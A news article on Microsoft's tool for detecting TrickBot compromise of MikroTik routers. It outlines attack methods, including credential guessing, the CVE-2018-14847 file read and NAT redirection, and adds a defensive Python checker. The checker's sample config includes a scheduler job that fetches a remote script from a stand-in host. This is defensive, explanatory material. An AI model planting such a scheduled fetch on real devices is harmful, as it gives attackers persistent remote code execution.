Microsoft tool detects whether a MikroTik router is part of the TrickBot botnet


Microsoft has released a new tool that scans MikroTik routers for signs of compromise by the TrickBot botnet. In these attacks, the affected routers act as a proxy between the control server and the infected computers.

The TrickBot malware has for years used IoT devices, such as routers, as intermediaries between infected devices and its control servers. Relaying commands through such proxies is meant to prevent security researchers and law enforcement agencies from tracing and disrupting the infrastructure.

Figure: TrickBot malware attack scheme

Attacks and configuration changes

In a new report, Microsoft researchers explain how the group behind TrickBot targeted vulnerable MikroTik routers and used several methods to compromise them. The network devices of this brand were attacked both through default credentials (which users often do not change) and through brute-force password guessing.

If these methods did not give access to the router, the attackers tried to exploit the more than three-year-old critical directory traversal vulnerability CVE-2018-14847, which allows unauthorized remote attackers to read arbitrary files. Using this vulnerability, they simply stole the user.dat file, which contains user login data.

Figure: Direct communication between the infected device and the control server

After gaining access to the device, the attackers issued commands that create a network address translation (NAT) rule. As a result, the routers redirected traffic from the control servers to computers on the local network. The attackers appear to be familiar with the limited feature set of the Linux-based operating system on MikroTik devices and use SSH commands that would make no sense on other devices.

Check your router

“In addition to the method described in this paper, we have identified several ways of attacking these devices. We have summarized our knowledge of these methods and known CVEs into an open-source tool that can extract forensic artifacts related to these attacks,” reports the Microsoft Defender for IoT research team.

Here is a list of some of the features that the tool can do:

  • Obtain the device version and view the detected vulnerabilities.
  • Check scheduled tasks.
  • Search for traffic redirection rules (NAT and other rules).
  • Look for DNS cache poisoning.
  • Look for a change to the default ports.
  • Search for non-default users.
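As an added example (not Microsoft's tool and not code from the article), the following Python script applies three of the checks listed above to a RouterOS configuration export: it flags dst-nat redirection rules, scheduler jobs outside an operator-supplied baseline, and users outside a baseline. The export text, the baselines and all addresses are constructed sample data, and the baselines are assumptions an operator would replace with their own.

```python
import re

# Constructed RouterOS "/export" snippet (sample data, not taken from a real device).
SAMPLE_EXPORT = """\
/ip firewall nat
add action=masquerade chain=srcnat out-interface=ether1
add action=dst-nat chain=dstnat dst-port=443 protocol=tcp to-addresses=192.168.88.10 to-ports=443
/system scheduler
add interval=1d name=backup on-event="/system backup save" policy=read,write
add interval=10m name=upd on-event="/tool fetch url=http://203.0.113.5/x.rsc" policy=ftp,reboot,read,write
/user
add group=full name=admin
add group=full name=svc
"""

BASELINE_USERS = {"admin"}         # accounts expected on this device (assumption)
BASELINE_SCHEDULERS = {"backup"}   # scheduled jobs the operator created (assumption)


def parse_export(text):
    """Group 'add ...' lines under their '/section' header: section -> list of key/value dicts."""
    sections, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("/"):
            current = line
            sections.setdefault(current, [])
        elif line.startswith("add ") and current is not None:
            # key=value pairs; a value may be double-quoted and contain spaces
            pairs = re.findall(r'(\S+?)=("[^"]*"|\S+)', line[4:])
            sections[current].append({k: v.strip('"') for k, v in pairs})
    return sections


def review(text, users=BASELINE_USERS, jobs=BASELINE_SCHEDULERS):
    """Return review findings: traffic redirection rules, unexpected scheduler jobs, extra users."""
    cfg = parse_export(text)
    findings = []
    for rule in cfg.get("/ip firewall nat", []):
        if rule.get("action") == "dst-nat":   # any inbound redirection deserves a look
            findings.append(f"dst-nat rule forwards port {rule.get('dst-port')} "
                            f"to {rule.get('to-addresses')}:{rule.get('to-ports')}")
    for job in cfg.get("/system scheduler", []):
        if job.get("name") not in jobs:
            findings.append(f"unexpected scheduler job {job.get('name')!r} runs: {job.get('on-event')}")
    for user in cfg.get("/user", []):
        if user.get("name") not in users:
            findings.append(f"non-baseline user {user.get('name')!r} in group {user.get('group')}")
    return findings


if __name__ == "__main__":
    for finding in review(SAMPLE_EXPORT):
        print(finding)
```

Feed it the output of `/export` from a device; every finding is a candidate for review rather than proof of compromise, so compare it against what the operator actually configured.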

The tool is published on GitHub and can search for suspicious settings and for vulnerabilities that need to be fixed on the router. So if you have a MikroTik router at home or in your company, it is definitely a good idea to check that it is not acting as a proxy for malicious activity.
